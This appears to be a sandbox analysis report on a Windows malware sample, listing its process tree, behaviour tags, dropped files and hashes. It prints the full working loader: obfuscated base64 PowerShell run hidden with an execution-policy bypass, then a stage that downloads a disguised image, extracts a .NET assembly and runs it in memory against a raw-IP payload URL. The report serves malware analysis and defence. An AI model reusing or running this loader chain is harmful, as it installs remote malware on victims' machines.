䷯CQ⧶ ㊑ ⨈ ㎄ ䷯YwBv⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BC⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯WwBT⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯EM⧶ ㊑ ⨈ ㎄ ䷯bwBu⧶ ㊑ ⨈ ㎄ ䷯HY⧶ ㊑ ⨈ ㎄ ䷯ZQBy⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯XQ⧶ ㊑ ⨈ ㎄ ䷯6⧶ ㊑ ⨈ ㎄ ䷯Do⧶ ㊑ ⨈ ㎄ ䷯RgBy⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯bQBC⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯cwBl⧶ ㊑ ⨈ ㎄ ䷯DY⧶ ㊑ ⨈ ㎄ ䷯N⧶ ㊑ ⨈ ㎄ ䷯BT⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯cgBp⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Zw⧶ ㊑ ⨈ ㎄ ䷯o⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯YgBh⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯ZQ⧶ ㊑ ⨈ ㎄ ䷯2⧶ ㊑ ⨈ ㎄ ䷯DQ⧶ ㊑ ⨈ ㎄ ䷯QwBv⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯p⧶ ㊑ ⨈ ㎄ ䷯Ds⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bs⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯YQBk⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BB⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯cwBl⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YgBs⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯WwBT⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯FI⧶ ㊑ ⨈ ㎄ ䷯ZQBm⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯ZQBj⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯aQBv⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯LgBB⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯cwBl⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YgBs⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯XQ⧶ ㊑ ⨈ ㎄ ䷯6⧶ ㊑ ⨈ ㎄ ䷯Do⧶ ㊑ ⨈ ㎄ ䷯T⧶ ㊑ ⨈ ㎄ ䷯Bv⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯o⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯YwBv⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BC⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯KQ⧶ ㊑ ⨈ ㎄ ䷯7⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯B5⧶ ㊑ ⨈ ㎄ ䷯H⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯ZQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯D0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯bwBh⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯ZQBk⧶ ㊑ ⨈ ㎄ ䷯EE⧶ ㊑ ⨈ ㎄ ䷯cwBz⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQBi⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯eQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Ec⧶ ㊑ ⨈ ㎄ ䷯ZQB0⧶ ㊑ ⨈ ㎄ ䷯FQ⧶ ㊑ ⨈ ㎄ ䷯eQBw⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯K⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯bgBs⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯Yg⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Ek⧶ ㊑ ⨈ ㎄ ䷯Tw⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Eg⧶ ㊑ ⨈ ㎄ ䷯bwBt⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯Jw⧶ ㊑ ⨈ ㎄ ䷯p⧶ ㊑ ⨈ ㎄ ䷯Ds⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bt⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bo⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯D0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯eQBw⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯LgBH⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BN⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bo⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯o⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯VgBB⧶ ㊑ ⨈ ㎄ ䷯Ek⧶ ㊑ ⨈ ㎄ ䷯Jw⧶ ㊑ ⨈ ㎄ ䷯p⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯SQBu⧶ ㊑ ⨈ ㎄ ䷯HY⧶ ㊑ ⨈ ㎄ ䷯bwBr⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯K⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯dQBs⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯L⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Fs⧶ ㊑ ⨈ ㎄ ䷯bwBi⧶ ㊑ ⨈ ㎄ ䷯Go⧶ ㊑ ⨈ ㎄ ䷯ZQBj⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯WwBd⧶ ㊑ ⨈ ㎄ ䷯F0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯o⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯B4⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯LgB4⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQBB⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯aQB0⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯b⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯v⧶ ㊑ ⨈ ㎄ ䷯DM⧶ ㊑ ⨈ ㎄ ䷯MQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯DE⧶ ㊑ ⨈ ㎄ ䷯Mw⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯DI⧶ ㊑ ⨈ ㎄ ䷯Nw⧶ ㊑ ⨈ ㎄ ䷯x⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯Nw⧶ ㊑ ⨈ ㎄ ䷯w⧶ ㊑ ⨈ ㎄ ䷯DE⧶ ㊑ ⨈ ㎄ ䷯Lw⧶ ㊑ ⨈ ㎄ ䷯v⧶ ㊑ ⨈ ㎄ ䷯Do⧶ ㊑ ⨈ ㎄ ䷯c⧶ ㊑ ⨈ ㎄ ䷯B0⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯a⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯L⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯YQB0⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯dgBh⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯bw⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯L⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯YQB0⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯dgBh⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯bw⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯L⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯YQB0⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯dgBh⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯bw⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯Cw⧶ ㊑ ⨈ ㎄ ䷯JwBB⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BJ⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯U⧶ ㊑ ⨈ ㎄ ䷯By⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯YwBl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯cw⧶ ㊑ ⨈ ㎄ ䷯z⧶ ㊑ ⨈ ㎄ ䷯DI⧶ ㊑ ⨈ ㎄ ䷯Jw⧶ ㊑ ⨈ ㎄ ䷯s⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Jw⧶ ㊑ ⨈ ㎄ ䷯p⧶ ㊑ ⨈ ㎄ ䷯Ck⧶ ㊑ ⨈ ㎄ ䷯';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⧶ ㊑ ⨈ ㎄ ䷯','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.xemAnital/31.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2504

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    009156bcbc6ad975612c8502c8b03305

    SHA1

    d432e65bf30cc8c97862bed7e3eda7d4c0236207

    SHA256

    02f2fcd2ab1572a402548a15d78daf8cc5af56a8ef4bf211adae5ce3f480479e

    SHA512

    29add16bf444a2bc0e37f30102307a1a22587afffd27f22f4864057f9f9c78dedfac08e571905a6ccbd0e7a84bc1568f2d99d19d4bd2e3f990cf86c363dc0530

  • C:\Users\Admin\AppData\Roaming\bellailoveyou.vbs

    Filesize

    619KB

    MD5

    91056f72aff8e4376be1a87bace0b941

    SHA1

    a1aa6bbf1452e59c807d7b422232551178bf9aa6

    SHA256

    c747de9b36d7f6c9a0beed8892d137d86ea48c9448c458d9e114860c80504bc8

    SHA512

    94fc0791df0c051b2d765dc6f52444aaf747d63d53a215aaf37d19dcf306829dd1c9a5530ebc476819c8f781d43a863e9bd8e41299ca26be71db80b46e717744

  • memory/668-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/668-1-0x000000007201D000-0x0000000072028000-memory.dmp

    Filesize

    44KB

  • memory/668-16-0x000000007201D000-0x0000000072028000-memory.dmp

    Filesize

    44KB

  • memory/668-18-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/668-19-0x000000007201D000-0x0000000072028000-memory.dmp

    Filesize

    44KB